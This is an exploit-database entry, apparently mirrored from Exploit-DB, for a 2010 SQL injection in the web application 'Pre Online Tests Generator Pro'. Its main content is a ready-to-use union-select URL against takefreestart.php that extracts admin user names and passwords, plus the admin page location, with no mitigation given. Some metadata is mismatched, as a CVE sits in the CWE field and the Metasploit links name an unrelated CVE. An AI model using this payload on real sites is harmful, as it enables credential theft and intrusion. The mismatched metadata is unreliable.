header-logo
Suggest Exploit
vendor:
Pre Online Tests Generator Pro
by:
Cru3l.b0y
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pre Online Tests Generator Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: CVE-2010-4456
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4456/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Pre Online Tests Generator Pro SQL Injection Vulnerability

http://target/path/takefreestart.php?tid=242&tid2=-1+union+select+1,2,3,group_concat(user_name,0x3a,user_pass),5,6,7,8+from+admin--&nxtq=true&q_no=1

Mitigation:

N/A
Source

Exploit-DB raw data:

In The Name Of GOD
[+] Exploit Title: Pre Online Tests Generator Pro SQL Injection Vulnerability
[+] Date: 2010-11-13
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.preproject.com/preexampro.asp
[+] Price : 95.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit : 

             http://target/path/takefreestart.php?tid=242&tid2=-1+union+select+1,2,3,group_concat(user_name,0x3a,user_pass),5,6,7,8+from+admin--&nxtq=true&q_no=1

[+] Admin Page: /admin

Navigation

Suggest Exploit

Services By CQR